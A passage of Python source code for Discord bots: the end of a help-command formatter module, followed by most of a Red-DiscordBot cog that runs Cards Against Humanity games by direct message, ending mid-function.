Sequence[:class:`Command`] A list of commands to indent for output. heading: :class:`str` The heading to add to the output. This is only added if the list of commands is greater than 0. max_size: Optional[:class:`int`] The max size to use for the gap between indents. If unspecified, calls :meth:`~HelpCommand.get_max_size` on the commands parameter. """ if not commands: return self.paginator.add_line(heading) max_size = max_size or self.get_max_size(commands) get_width = fosscord.utils._string_width for command in commands: name = command.name width = max_size - (get_width(name) - len(name)) entry = f'{self.indent * " "}{name:<{width}} {command.short_doc}' self.paginator.add_line(self.shorten_text(entry)) async def send_pages(self): """A helper utility to send the page output from :attr:`paginator` to the destination.""" destination = self.get_destination() for page in self.paginator.pages: await destination.send(page) def add_command_formatting(self, command): """A utility function to format the non-indented block of commands and groups. Parameters ------------ command: :class:`Command` The command to format. """ if command.description: self.paginator.add_line(command.description, empty=True) signature = self.get_command_signature(command) self.paginator.add_line(signature, empty=True) if command.help: try: self.paginator.add_line(command.help, empty=True) except RuntimeError: for line in command.help.splitlines(): self.paginator.add_line(line) self.paginator.add_line() def get_destination(self): ctx = self.context if self.dm_help is True: return ctx.author elif self.dm_help is None and len(self.paginator) > self.dm_help_threshold: return ctx.author else: return ctx.channel async def prepare_help_command(self, ctx, command): self.paginator.clear() await super().prepare_help_command(ctx, command) async def send_bot_help(self, mapping): ctx = self.context bot = ctx.bot if bot.description: # <description> portion self.paginator.add_line(bot.description, empty=True) no_category = f'\u200b{self.no_category}:' def get_category(command, *, no_category=no_category): cog = command.cog return cog.qualified_name + ':' if cog is not None else no_category filtered = await self.filter_commands(bot.commands, sort=True, key=get_category) max_size = self.get_max_size(filtered) to_iterate = itertools.groupby(filtered, key=get_category) # Now we can add the commands to the page. for category, commands in to_iterate: commands = sorted(commands, key=lambda c: c.name) if self.sort_commands else list(commands) self.add_indented_commands(commands, heading=category, max_size=max_size) note = self.get_ending_note() if note: self.paginator.add_line() self.paginator.add_line(note) await self.send_pages() async def send_command_help(self, command): self.add_command_formatting(command) self.paginator.close_page() await self.send_pages() async def send_group_help(self, group): self.add_command_formatting(group) filtered = await self.filter_commands(group.commands, sort=self.sort_commands) self.add_indented_commands(filtered, heading=self.commands_heading) if filtered: note = self.get_ending_note() if note: self.paginator.add_line() self.paginator.add_line(note) await self.send_pages() async def send_cog_help(self, cog): if cog.description: self.paginator.add_line(cog.description, empty=True) filtered = await self.filter_commands(cog.get_commands(), sort=self.sort_commands) self.add_indented_commands(filtered, heading=self.commands_heading) note = self.get_ending_note() if note: self.paginator.add_line() self.paginator.add_line(note) await self.send_pages() class MinimalHelpCommand(HelpCommand): """An implementation of a help command with minimal output. This inherits from :class:`HelpCommand`. Attributes ------------ sort_commands: :class:`bool` Whether to sort the commands in the output alphabetically. Defaults to ``True``. commands_heading: :class:`str` The command list's heading string used when the help command is invoked with a category name. Useful for i18n. Defaults to ``"Commands"`` aliases_heading: :class:`str` The alias list's heading string used to list the aliases of the command. Useful for i18n. Defaults to ``"Aliases:"``. dm_help: Optional[:class:`bool`] A tribool that indicates if the help command should DM the user instead of sending it to the channel it received it from. If the boolean is set to ``True``, then all help output is DM'd. If ``False``, none of the help output is DM'd. If ``None``, then the bot will only DM when the help message becomes too long (dictated by more than :attr:`dm_help_threshold` characters). Defaults to ``False``. dm_help_threshold: Optional[:class:`int`] The number of characters the paginator must accumulate before getting DM'd to the user if :attr:`dm_help` is set to ``None``. Defaults to 1000. no_category: :class:`str` The string used when there is a command which does not belong to any category(cog). Useful for i18n. Defaults to ``"No Category"`` paginator: :class:`Paginator` The paginator used to paginate the help command output. """ def __init__(self, **options): self.sort_commands = options.pop('sort_commands', True) self.commands_heading = options.pop('commands_heading', "Commands") self.dm_help = options.pop('dm_help', False) self.dm_help_threshold = options.pop('dm_help_threshold', 1000) self.aliases_heading = options.pop('aliases_heading', "Aliases:") self.no_category = options.pop('no_category', 'No Category') self.paginator = options.pop('paginator', None) if self.paginator is None: self.paginator = Paginator(suffix=None, prefix=None) super().__init__(**options) async def send_pages(self): """A helper utility to send the page output from :attr:`paginator` to the destination.""" destination = self.get_destination() for page in self.paginator.pages: await destination.send(page) def get_opening_note(self): """Returns help command's opening note. This is mainly useful to override for i18n purposes. The default implementation returns :: Use `{prefix}{command_name} [command]` for more info on a command. You can also use `{prefix}{command_name} [category]` for more info on a category. Returns ------- :class:`str` The help command opening note. """ command_name = self.invoked_with return ( f"Use `{self.context.clean_prefix}{command_name} [command]` for more info on a command.\n" f"You can also use `{self.context.clean_prefix}{command_name} [category]` for more info on a category." ) def get_command_signature(self, command): return f'{self.context.clean_prefix}{command.qualified_name} {command.signature}' def get_ending_note(self): """Return the help command's ending note. This is mainly useful to override for i18n purposes. The default implementation does nothing. Returns ------- :class:`str` The help command ending note. """ return None def add_bot_commands_formatting(self, commands, heading): """Adds the minified bot heading with commands to the output. The formatting should be added to the :attr:`paginator`. The default implementation is a bold underline heading followed by commands separated by an EN SPACE (U+2002) in the next line. Parameters ----------- commands: Sequence[:class:`Command`] A list of commands that belong to the heading. heading: :class:`str` The heading to add to the line. """ if commands: # U+2002 Middle Dot joined = '\u2002'.join(c.name for c in commands) self.paginator.add_line(f'__**{heading}**__') self.paginator.add_line(joined) def add_subcommand_formatting(self, command): """Adds formatting information on a subcommand. The formatting should be added to the :attr:`paginator`. The default implementation is the prefix and the :attr:`Command.qualified_name` optionally followed by an En dash and the command's :attr:`Command.short_doc`. Parameters ----------- command: :class:`Command` The command to show information of. """ fmt = '{0}{1} \N{EN DASH} {2}' if command.short_doc else '{0}{1}' self.paginator.add_line(fmt.format(self.context.clean_prefix, command.qualified_name, command.short_doc)) def add_aliases_formatting(self, aliases): """Adds the formatting information on a command's aliases. The formatting should be added to the :attr:`paginator`. The default implementation is the :attr:`aliases_heading` bolded followed by a comma separated list of aliases. This is not called if there are no aliases to format. Parameters ----------- aliases: Sequence[:class:`str`] A list of aliases to format. """ self.paginator.add_line(f'**{self.aliases_heading}** {", ".join(aliases)}', empty=True) def add_command_formatting(self, command): """A utility function to format commands and groups. Parameters ------------ command: :class:`Command` The command to format. """ if command.description: self.paginator.add_line(command.description, empty=True) signature = self.get_command_signature(command) if command.aliases: self.paginator.add_line(signature) self.add_aliases_formatting(command.aliases) else: self.paginator.add_line(signature, empty=True) if command.help: try: self.paginator.add_line(command.help, empty=True) except RuntimeError: for line in command.help.splitlines(): self.paginator.add_line(line) self.paginator.add_line() def get_destination(self): ctx = self.context if self.dm_help is True: return ctx.author elif self.dm_help is None and len(self.paginator) > self.dm_help_threshold: return ctx.author else: return ctx.channel async def prepare_help_command(self, ctx, command): self.paginator.clear() await super().prepare_help_command(ctx, command) async def send_bot_help(self, mapping): ctx = self.context bot = ctx.bot if bot.description: self.paginator.add_line(bot.description, empty=True) note = self.get_opening_note() if note: self.paginator.add_line(note, empty=True) no_category = f'\u200b{self.no_category}' def get_category(command, *, no_category=no_category): cog = command.cog return cog.qualified_name if cog is not None else no_category filtered = await self.filter_commands(bot.commands, sort=True, key=get_category) to_iterate = itertools.groupby(filtered, key=get_category) for category, commands in to_iterate: commands = sorted(commands, key=lambda c: c.name) if self.sort_commands else list(commands) self.add_bot_commands_formatting(commands, category) note = self.get_ending_note() if note: self.paginator.add_line() self.paginator.add_line(note) await self.send_pages() async def send_cog_help(self, cog): bot = self.context.bot if bot.description: self.paginator.add_line(bot.description, empty=True) note = self.get_opening_note() if note: self.paginator.add_line(note, empty=True) if cog.description: self.paginator.add_line(cog.description, empty=True) filtered = await self.filter_commands(cog.get_commands(), sort=self.sort_commands) if filtered: self.paginator.add_line(f'**{cog.qualified_name} {self.commands_heading}**') for command in filtered: self.add_subcommand_formatting(command) note = self.get_ending_note() if note: self.paginator.add_line() self.paginator.add_line(note) await self.send_pages() async def send_group_help(self, group): self.add_command_formatting(group) filtered = await self.filter_commands(group.commands, sort=self.sort_commands) if filtered: note = self.get_opening_note() if note: self.paginator.add_line(note, empty=True) self.paginator.add_line(f'**{self.commands_heading}**') for command in filtered: self.add_subcommand_formatting(command) note = self.get_ending_note() if note: self.paginator.add_line() self.paginator.add_line(note) await self.send_pages() async def send_command_help(self, command): self.add_command_formatting(command) self.paginator.close_page() await self.send_pages()
import asyncio import discord import html import json import random import time from random import shuffle from redbot.core import commands from redbot.core.data_manager import bundled_data_path class CardsAgainstHumanity(commands.Cog): def __init__(self, bot): self.bot = bot self.games = [] self.maxBots = ( 5 # Max number of bots that can be added to a game - don't count toward max players ) self.maxPlayers = 10 # Max players for ranjom joins self.maxDeadTime = 3600 # Allow an hour of dead time before killing a game self.checkTime = 300 # 5 minutes between dead time checks self.winAfter = 10 # 10 wins for the game self.botWaitMin = ( 5 # Minimum number of seconds before the bot makes a decision (default 5) ) self.botWaitMax = 30 # Max number of seconds before a bot makes a decision (default 30) self.userTimeout = 500 # 5 minutes to timeout self.utCheck = 30 # Check timeout every 30 seconds self.utWarn = 60 # Warn the user if they have 60 seconds or less before being kicked self.charset = "1234567890" self.botName = "Rando Cardrissian" self.minMembers = 3 self.bot.loop.create_task(self.checkDead()) self.bot.loop.create_task(self.checkUserTimeout()) def cleanJson(self, json): json = html.unescape(json) # Clean out html formatting json = json.replace("_", "[blank]") json = json.replace("<br>", "\n") json = json.replace("<br/>", "\n") json = json.replace("<i>", "*") json = json.replace("</i>", "*") return json def displayname(self, member: discord.Member): # A helper function to return the member's display name nick = name = None try: nick = member.nick except AttributeError: pass try: name = member.name except AttributeError: pass if nick: return nick if name: return name return None def memberforname(self, name, server): # Check nick first - then name for member in server.members: if member.nick: if member.nick.lower() == name.lower(): return member for member in server.members: if member.name.lower() == name.lower(): return member # No member yet - try ID memID = "".join(list(filter(str.isdigit, name))) newMem = self.memberforid(memID, server) if newMem: return newMem return None @staticmethod def memberforid(checkid, server): for member in server.members: if str(member.id) == str(checkid): return member return None def getreadabletimebetween(self, first, last): # A helper function to make a readable string between two times timeBetween = int(last - first) weeks = int(timeBetween / 604800) days = int((timeBetween - (weeks * 604800)) / 86400) hours = int((timeBetween - (days * 86400 + weeks * 604800)) / 3600) minutes = int((timeBetween - (hours * 3600 + days * 86400 + weeks * 604800)) / 60) seconds = int(timeBetween - (minutes * 60 + hours * 3600 + days * 86400 + weeks * 604800)) msg = "" if weeks > 0: if weeks == 1: msg = f"{msg}{str(weeks)} week, " else: msg = f"{msg}{str(weeks)} weeks, " if days > 0: if days == 1: msg = f"{msg}{str(days)} day, " else: msg = f"{msg}{str(days)} days, " if hours > 0: if hours == 1: msg = f"{msg}{str(hours)} hour, " else: msg = f"{msg}{str(hours)} hours, " if minutes > 0: if minutes == 1: msg = f"{msg}{str(minutes)} minute, " else: msg = f"{msg}{str(minutes)} minutes, " if seconds > 0: if seconds == 1: msg = f"{msg}{str(seconds)} second, " else: msg = f"{msg}{str(seconds)} seconds, " if not msg: return "0 seconds" else: return msg[:-2] async def checkUserTimeout(self): while True: # Wait first - then check await asyncio.sleep(self.utCheck) for game in self.games: if not game["Timeout"]: continue if len(game["Members"]) >= self.minMembers: # Game is started for member in game["Members"]: if member["IsBot"]: continue if game["Judging"]: if not member == game["Members"][game["Judge"]]: # Not the judge - don't hold against the user member["Time"] = int(time.time()) continue else: # Not judging if member == game["Members"][game["Judge"]]: # The judge - don't hold that against them member["Time"] = int(time.time()) continue currentTime = int(time.time()) userTime = member["Time"] downTime = currentTime - userTime # Check if downTime results in a kick if downTime >= self.userTimeout: # You gettin kicked, son. await self.removeMember(member["User"]) self.checkGame(game) continue # Check if downTime is in warning time if downTime >= (self.userTimeout - self.utWarn): # Check if we're at warning phase if self.userTimeout - downTime >= (self.utWarn - self.utCheck): kickTime = self.userTimeout - downTime if kickTime % self.utCheck: # Kick time isn't exact time - round out to the next loop kickTime = kickTime - (kickTime % self.utCheck) + self.utCheck # Warning time! timeString = self.getreadabletimebetween(0, kickTime) await member["User"].send( f"**WARNING** - You will be kicked from the game if you do not make a move in *{timeString}!*" ) else: for member in game["Members"]: # Reset timer member["Time"] = int(time.time()) async def checkDead(self): while True: # Wait first - then check await asyncio.sleep(self.checkTime) for game in self.games: gameTime = game["Time"] currentTime = int(time.time()) timeRemain = currentTime - gameTime if timeRemain > self.maxDeadTime: # Game is dead - quit it and alert members for member in game["Members"]: if member["IsBot"]: # Clear pending tasks and set to None if not member["Task"] == None: task = member["Task"] if not task.done(): task.cancel() member["Task"] = None continue await member["User"].send( f"Game id: *{game["ID"]}* has been closed due to inactivity." ) # Set running to false game["Running"] = False self.games.remove(game) async def checkPM(self, message): # Checks if we're talking in PM, and if not - outputs an error if isinstance(message.channel, discord.abc.PrivateChannel): # PM return True else: # Not in PM await message.channel.send("Cards Against Humanity commands must be run in PM.") return False def randomID(self, length=8): # Create a random id that doesn't already exist while True: # Repeat until found newID = "".join(random.choice(self.charset) for i in range(length)) exists = False for game in self.games: if game["ID"] == newID: exists = True break if not exists: break return newID def randomBotID(self, game, length=4): # Returns a random id for a bot that doesn't already exist while True: # Repeat until found newID = "".join(random.choice(self.charset) for i in range(length)) exists = False for member in game["Members"]: if member["ID"] == newID: exists = True break if not exists: break return newID async def userGame(self, user): # Returns the game the user is currently in if not len(str(user)) == 4: if not type(user) is int: # Assume it's a discord.Member/User user = user.id for game in self.games: for member in game["Members"]: if member["ID"] == user: # Found our user return game return None def gameForID(self, id): # Returns the game with the passed id for game in self.games: if game["ID"] == id: return game return None async def removeMember(self, user, game=None): if not len(str(user)) == 4: if not type(user) is int: # Assume it's a discord.Member/User user = user.id outcome = False removed = None if not game: game = await self.userGame(user) if game: for member in game["Members"]: if member["ID"] == user: removed = member outcome = True judgeChanged = False # Reset judging flag to retrigger actions game["Judging"] = False # Get current Judge - only if game has started if len(game["Members"]) >= self.minMembers: judge = game["Members"][game["Judge"]] game["Members"].remove(member) # Check if we're removing the current judge if judge == member: # Judge will change judgeChanged = True # Find out if our member was the last in line if game["Judge"] >= len(game["Members"]): game["Judge"] = 0 # Reset judge var judge = game["Members"][game["Judge"]] else: # Judge didn't change - so let's reset judge index index = game["Members"].index(judge) game["Judge"] = index else: judge = None # Just remove the member game["Members"].remove(member) if member["Creator"]: # We're losing the game creator - pick a new one for newCreator in game["Members"]: if not newCreator["IsBot"]: newCreator["Creator"] = True await newCreator["User"].send( "The creator of this game left. **YOU** are now the creator." ) break # Remove submissions for sub in game["Submitted"]: # Remove deleted member and new judge's submissions if sub["By"] == member or sub["By"] == judge: # Found it! game["Submitted"].remove(sub) break if member["IsBot"]: if not member["Task"] == None: task = member["Task"] if not task.done(): task.cancel() member["Task"] = None else: await member["User"].send( f"**You were removed from game id:** ***{game["ID"]}.***" ) # Removed, no need to finish the loop break if not outcome: return outcome # We removed someone - let's tell the world for member in game["Members"]: if member["IsBot"]: continue if removed["IsBot"]: msg = f"***{self.botName} ({removed["ID"]})*** **left the game - reorganizing...**" else: msg = f"***{self.displayname(removed["User"])}*** **left the game - reorganizing...**" # Check if the judge changed if judgeChanged: # Judge changed newJudge = game["Members"][game["Judge"]] if newJudge["IsBot"]: msg += f"\n\n***{self.botName} ({newJudge["ID"]})*** **is now judging!**" # Schedule judging task else: if newJudge == member: msg += "\n\n***YOU*** **are now judging!**" else: msg += f"\n\n***{newJudge["User"]}*** **is now judging!**" await member["User"].send(msg) return game def checkGame(self, game): for member in game["Members"]: if not member["IsBot"]: return True # If we got here - only bots, or empty game # Kill all bots' loops for member in game["Members"]: if member["IsBot"]: # Clear pending tasks and set to None if not member["Task"] == None: task = member["Task"] if not task.done(): task.cancel() member["Task"] = None # Set running to false game["Running"] = False self.games.remove(game) return False async def typing(self, game, typeTime=5): # Allows us to show the bot typing waitTime = random.randint(self.botWaitMin, self.botWaitMax) preType = waitTime - typeTime if preType > 0: await asyncio.sleep(preType) for member in game["Members"]: if member["IsBot"]: continue await asyncio.sleep(0.1) await asyncio.sleep(typeTime) else: for member in game["Members"]: if member["IsBot"]: continue await asyncio.sleep(0.1) await asyncio.sleep(waitTime) async def botPick(self, ctx, bot, game): # Has the bot pick their card blackNum = game["BlackCard"]["Pick"] if blackNum == 1: cardSpeak = "card" else: cardSpeak = "cards" i = 0 cards = [] while i < blackNum: randCard = random.randint(0, len(bot["Hand"]) - 1) cards.append(bot["Hand"].pop(randCard)["Text"]) i += 1 await self.typing(game) # Make sure we haven't laid any cards if bot["Laid"] == False and game["Judging"] == False: newSubmission = {"By": bot, "Cards": cards} game["Submitted"].append(newSubmission) # Shuffle cards shuffle(game["Submitted"]) bot["Laid"] = True game["Time"] = currentTime = int(time.time()) await self.checkSubmissions(ctx, game, bot) async def botPickWin(self, ctx, game): totalUsers = len(game["Members"]) - 1 submitted = len(game["Submitted"]) if submitted >= totalUsers: # Judge is a bot - and all cards are in! await self.typing(game) # Pick a winner winner = random.randint(0, totalUsers - 1) await self.winningCard(ctx, game, winner) async def checkSubmissions(self, ctx, game, user=None): totalUsers = len(game["Members"]) - 1 submitted = len(game["Submitted"]) for member in game["Members"]: msg = "" # Is the game running? if len(game["Members"]) < self.minMembers: if member["IsBot"]: # Clear pending tasks and set to None if not member["Task"] == None: task = member["Task"] if not task.done(): # Task isn't finished - we're on a new hand, cancel it task.cancel() member["Task"] = None continue # not enough members - send the embed stat_embed = discord.Embed(color=discord.Color.red()) stat_embed.set_author( name=f"Not enough players to continue! ({len(game["Members"])}/{self.minMembers})" ) stat_embed.set_footer( text=f"Have other users join with: {ctx.prefix}joincah {game["ID"]}" ) await member["User"].send(embed=stat_embed) continue if member["IsBot"] == True: continue # Check if we have a user if user: blackNum = game["BlackCard"]["Pick"] if blackNum == 1: card = "card" else: card = "cards" if user["IsBot"]: msg = f"*{self.botName} ({user["ID"]})* submitted their {card}! " else: if not member == user: # Don't say this to the submitting user msg = f"*{self.displayname(user["User"])}* submitted their {card}! " if submitted < totalUsers: msg += f"{submitted}/{totalUsers} cards submitted..." if len(msg): # We have something to say await member["User"].send(msg) async def checkCards(self, ctx, game): while True: if not game["Running"]: break # wait for 1 second await asyncio.sleep(1) # Check for all cards if len(game["Members"]) < self.minMembers: # Not enough members continue # Enough members - let's check if we're judging if game["Judging"]: continue # Enough members, and not judging - let's check cards totalUsers = len(game["Members"]) - 1 submitted = len(game["Submitted"]) if submitted >= totalUsers: game["Judging"] = True # We have enough cards for member in game["Members"]: if member["IsBot"]: continue msg = "All cards have been submitted!" # if await member["User"].send(msg) await self.showOptions(ctx, member["User"]) # Check if a bot is the judge judge = game["Members"][game["Judge"]] if not judge["IsBot"]: continue # task = self.bot.loop.create_task(self.botPickWin(ctx, game)) task = asyncio.ensure_future(self.botPickWin(ctx, game)) judge["Task"] = task async def winningCard(self, ctx, game, card): # Let's pick our card and alert everyone winner = game["Submitted"][card] if winner["By"]["IsBot"]: winnerName = f"{self.botName} ({winner["By"]["ID"]})" winner["By"]["Points"] += 1 winner["By"]["Won"].append(game["BlackCard"]["Text"]) else: winnerName = self.displayname(winner["By"]["User"]) for member in game["Members"]: if member["IsBot"]: continue stat_embed = discord.Embed(color=discord.Color.gold()) stat_embed.set_footer(text=f"Cards Against Humanity - id: {game["ID"]}") index = game["Members"].index(member) if index == game["Judge"]: stat_embed.set_author(name=f"You picked {winnerName}'s card!") elif member == winner["By"]: stat_embed.set_author(name="YOU WON!!") member["Points"] += 1 member["Won"].append(game["BlackCard"]["Text"]) else: stat_embed.set_author(name=f"{winnerName} won!") if len(winner["Cards"]) == 1: msg = "The **Winning** card was:\n\n{}".format( "{}".format(" - ".join(winner["Cards"])) ) else: msg = "The **Winning** cards were:\n\n{}".format( "{}".format(" - ".join(winner["Cards"])) ) await member["User"].send(embed=stat_embed) await member["User"].send(msg) await asyncio.sleep(0.1) # await self.nextPlay(ctx, game) # Start the game loop event = game["NextHand"] self.bot.loop.call_soon_threadsafe(event.set) game["Time"] = currentTime = int(time.time()) async def gameCheckLoop(self, ctx, game): task = game["NextHand"] while True: if not game["Running"]: break # Clear the pending task task.clear() # Queue up the next hand await self.nextPlay(ctx, game) # Wait until our next clear await task.wait() async def messagePlayers(self, ctx, message, game, judge=False): # Messages all the users on in a game for member in game["Members"]: if member["IsBot"]: continue # Not bots if member is game["Members"][game["Judge"]]: # Is the judge if judge: await member["User"].send(message) else: # Not the judge await member["User"].send(message) ################################################ async def showPlay(self, ctx, user): # Creates an embed and displays the current game stats stat_embed = discord.Embed(color=discord.Color.blue()) game = await self.userGame(user) if not game: return # Get the judge's name if game["Members"][game["Judge"]]["User"] == user: judge = "**YOU** are" else: if game["Members"][game["Judge"]]["IsBot"]: # Bot judge = f"*{self.botName} ({game["Members"][game["Judge"]]["ID"]})* is" else: judge = f"*{self.displayname(game["Members"][game["Judge"]]["User"])}* is" # Get the Black Card try: blackCard = game["BlackCard"]["Text"] blackNum = game["BlackCard"]["Pick"] except Exception: blackCard = "None." blackNum = 0 msg = f"{judge} the judge.\n\n" msg += f"__Black Card:__\n\n**{blackCard}**\n\n" totalUsers = len(game["Members"]) - 1 submitted = len(game["Submitted"]) if len(game["Members"]) >= self.minMembers: if submitted < totalUsers: msg += f"{submitted}/{totalUsers} cards submitted..." else: msg += "All cards have been submitted!" await self.showOptions(ctx, user) return if not judge == "**YOU** are": # Judge doesn't need to lay a card if blackNum == 1: # Singular msg += f"\n\nLay a card with `{ctx.prefix}lay [card number]`" elif blackNum > 1: # Plural msg += f"\n\nLay **{blackNum} cards** with `{ctx.prefix}lay [card numbers separated by commas (1,2,3)]`" stat_embed.set_author(name="Current Play") stat_embed.set_footer(text=f"Cards Against Humanity - id: {game["ID"]}") await user.send(embed=stat_embed) await user.send(msg) async def showHand(self, ctx, user): # Shows the user's hand in an embed stat_embed = discord.Embed(color=discord.Color.green()) game = await self.userGame(user) if not game: return i = 0 msg = "" points = "? points" for member in game["Members"]: if member["ID"] == user.id: # Got our user if member["Points"] == 1: points = "1 point" else: points = f"{member["Points"]} points" for card in member["Hand"]: i += 1 msg += f"{i}. {card["Text"]}\n" try: blackCard = f"**{game["BlackCard"]["Text"]}**" except Exception: blackCard = "**None.**" stat_embed.set_author(name=f"Your Hand - {points}") stat_embed.set_footer(text=f"Cards Against Humanity - id: {game["ID"]}") await user.send(embed=stat_embed) await user.send(msg) async def showOptions(self, ctx, user): # Shows the judgement options stat_embed = discord.Embed(color=discord.Color.orange()) game = await self.userGame(user) if not game: return # Add title stat_embed.set_author(name="JUDGEMENT TIME!!") stat_embed.set_footer(text=f"Cards Against Humanity - id: {game["ID"]}") await user.send(embed=stat_embed) if game["Members"][game["Judge"]]["User"] == user: judge = "**YOU** are" else: if game["Members"][game["Judge"]]["IsBot"]: # Bot judge = f"*{self.botName} ({game["Members"][game["Judge"]]["ID"]})* is" else: judge = f"*{self.displayname(game["Members"][game["Judge"]]["User"])}* is" blackCard = game["BlackCard"]["Text"] msg = f"{judge} judging.\n\n" msg += f"__Black Card:__\n\n**{blackCard}**\n\n" msg += "__Submitted White Cards:__\n\n" i = 0 for sub in game["Submitted"]: i += 1 msg += "{}. {}\n".format(i, " - ".join(sub["Cards"])) if judge == "**YOU** are": msg += f"\nPick a winner with `{ctx.prefix}pick [submission number]`." await user.send(msg) async def drawCard(self, game): with open(str(bundled_data_path(self)) + "/deck.json", "r") as deck_file: deck = json.load(deck_file) # Draws a random unused card and shuffles the deck if needed totalDiscard = len(game["Discard"]) for member in game["Members"]: totalDiscard += len(member["Hand"]) if totalDiscard >= len(deck["whiteCards"]): # Tell everyone the cards were shuffled for member in game["Members"]: if member["IsBot"]: continue user = member["User"] await user.send("Shuffling white cards...") # Shuffle the cards self.shuffle(game) while True: # Random grab a unique card index = random.randint(0, len(deck["whiteCards"]) - 1) if not index in game["Discard"]: game["Discard"].append(index) text = deck["whiteCards"][index] text = self.cleanJson(text) card = {"Index": index, "Text": text} return card def shuffle(self, game): # Adds discards back into the deck game["Discard"] = [] for member in game["Members"]: for card in member["Hand"]: game["Discard"].append(card["Index"]) async def drawCards(self, user, cards=10): if not len(str(user)) == 4: if not type(user) is int: # Assume it's a discord.Member/User user = user.id # fills the user's hand up to number of cards game = await self.userGame(user) for member in game["Members"]: if member["ID"] == user: # Found our user - let's draw cards i = len(member["Hand"]) while i < cards: # Draw unique cards until we fill our hand newCard = await self.drawCard(game) member["Hand"].append(newCard) i += 1 async def drawBCard(self, game): with open(str(bundled_data_path(self)) + "/deck.json", "r") as deck_file: deck = json.load(deck_file) # Draws a random black card totalDiscard = len(game["BDiscard"]) if totalDiscard >= len(deck["blackCards"]): # Tell everyone the cards were shuffled for member in game["Members"]: if member["IsBot"]: continue user = member["User"] await user.send("Shuffling black cards...") # Shuffle the cards game["BDiscard"] = [] while True: # Random grab a unique card index = random.randint(0, len(deck["blackCards"]) - 1) if not index in game["BDiscard"]: game["BDiscard"].append(index) text = deck["blackCards"][index]["text"] text = self.cleanJson(text) game["BlackCard"] = {"Text": text, "Pick": deck["blackCards"][index]["pick"]} return game["BlackCard"] async def nextPlay(self, ctx, game): # Advances the game if len(game["Members"]) < self.minMembers: stat_embed = discord.Embed(color=discord.Color.red()) stat_embed.set_author( name=f"Not enough players to continue! ({len(game["Members"])}/{self.minMembers})" ) stat_embed.set_footer( text=f"Have other users join with: {ctx.prefix}joincah {game["ID"]}" ) for member in game["Members"]: if member["IsBot"]: continue await member["User"].send(embed=stat_embed) return # Find if we have a winner winner = False stat_embed = discord.Embed(color=discord.Color.lighter_grey()) for member in game["Members"]: if member["IsBot"]: # Clear pending tasks and set to None if not member["Task"] == None: task = member["Task"] if not task.done(): # Task isn't finished - we're on a new hand, cancel it task.cancel() member["Task"] = None if member["Points"] >= self.winAfter: # We have a winner! winner = True if member["IsBot"]: stat_embed.set_author(name=f"{self.botName} ({member["ID"]}) is the WINNER!!") else: stat_embed.set_author( name=f"{self.displayname(member["User"])} is the WINNER!!" ) stat_embed.set_footer(text="Congratulations!") break if winner: for member in game["Members"]: if not member["IsBot"]: await member["User"].send(embed=stat_embed) # Reset all users member["Hand"] = [] member["Points"] = 0 member["Won"] = [] member["Laid"] = False member["Refreshed"] = False return game["Judging"] = False # Clear submitted cards game["Submitted"] = [] # We have enough members if game["Judge"] == -1: # First game - randomize judge game["Judge"] = random.randint(0, len(game["Members"]) - 1) else: game["Judge"] += 1 # Reset the judge if out of bounds if game["Judge"] >= len(game["Members"]): game["Judge"] = 0 # Draw the next black card bCard = await self.drawBCard(game) # Draw cards for member in game["Members"]: member["Laid"] = False await self.drawCards(member["ID"]) # Show hands for member in game["Members"]: if member["IsBot"]: continue await self.showPlay(ctx, member["User"]) index = game["Members"].index(member) if not index == game["Judge"]: await self.showHand(ctx, member["User"]) await asyncio.sleep(0.1) # Have the bots lay their cards for member in game["Members"]: if not member["IsBot"]: continue if member["ID"] == game["Members"][game["Judge"]]["ID"]: continue # Not a human player, and not the judge # task = self.bot.loop.create_task(self.botPick(ctx, member, game))\ task = asyncio.ensure_future(self.botPick(ctx, member, game)) member["Task"] = task # await self.botPick(ctx, member, game) @commands.command() async def game(self, ctx, *, message=None): """Displays the game's current status.""" if not await self.checkPM(ctx.message): return userGame = await self.userGame(ctx.author) if not userGame: msg = f"You're not in a game - you can create one with `{ctx.prefix}newcah` or join one with `{ctx.prefix}joincah`." return await ctx.author.send(msg) await self.showPlay(ctx, ctx.author) @commands.command() async def chat(self, ctx, *, message=None): """Broadcasts a message to the other players in your game.""" if not await self.checkPM(ctx.message): return userGame = await self.userGame(ctx.author) if not userGame: msg = f"You're not in a game - you can create one with `{ctx.prefix}newcah` or join one with `{ctx.prefix}joincah`." return await ctx.author.send(msg) userGame["Time"] = int(time.time()) if message == None: msg = "Ooookay, you say *nothing...*" return await ctx.author.send(msg) msg = f"*{ctx.author.name}* says: {message}" for member in userGame["Members"]: if member["IsBot"]: continue # Tell them all!! if not member["User"] == ctx.author: # Don't tell yourself await member["User"].send(msg) else: # Update member's time member["Time"] = int(time.time()) await ctx.author.send("Message sent!") @commands.command() async def lay(self, ctx, *, card=None): """Lays a card or cards from your hand. If multiple cards are needed, separate them by a comma (1,2,3).""" if not await self.checkPM(ctx.message): return userGame = await self.userGame(ctx.author) if not userGame: msg = f"You're not in a game - you can create one with `{ctx.prefix}newcah` or join one with `{ctx.prefix}joincah`." return await ctx.author.send(msg) userGame["Time"] = int(time.time()) for member in userGame["Members"]: if member["User"] == ctx.author: member["Time"] = int(time.time()) user = member index = userGame["Members"].index(member) if index == userGame["Judge"]: await ctx.author.send( "You're the judge. You don't get to lay cards this round." ) return for submit in userGame["Submitted"]: if submit["By"]["User"] == ctx.author: await ctx.author.send("You already made your submission this round.") return if card == None: await ctx.author.send("You need you input *something.*") return card = card.strip() card = card.replace(" ", "") # Not the judge if len(userGame["Members"]) < self.minMembers: stat_embed = discord.Embed(color=discord.Color.red()) stat_embed.set_author( name=f"Not enough players to continue! ({len(userGame["Members"])}/{self.minMembers})" ) stat_embed.set_footer( text=f"Have other users join with: {ctx.prefix}joincah {userGame["ID"]}" ) return await ctx.author.send(embed=stat_embed) numberCards = userGame["BlackCard"]["Pick"] cards = [] if numberCards > 1: cardSpeak = "cards" try: card = card.split(",") except Exception: card = [] if not len(card) == numberCards: await ctx.author.send( f"You need to lay **{numberCards} cards** (no duplicates) with `{ctx.prefix}lay [card numbers separated by commas (1,2,3)]`" ) return await self.showHand(ctx, ctx.author) # Got something # Check for duplicates if not len(card) == len(set(card)): await ctx.author.send( f"You need to lay **{numberCards} cards** (no duplicates) with `{ctx.prefix}lay [card numbers separated by commas (1,2,3)]`" ) return await self.showHand(ctx, ctx.author) # Works for c in card: try: c = int(c) except Exception: await ctx.author.send( f"You need to lay **{numberCards} cards** (no duplicates) with `{ctx.prefix}lay [card numbers separated by commas (1,2,3)]`" ) return await self.showHand(ctx, ctx.author) if c < 1 or c > len(user["Hand"]): await ctx.author.send( f"Card numbers must be between 1 and {len(user["Hand"])}." ) return await 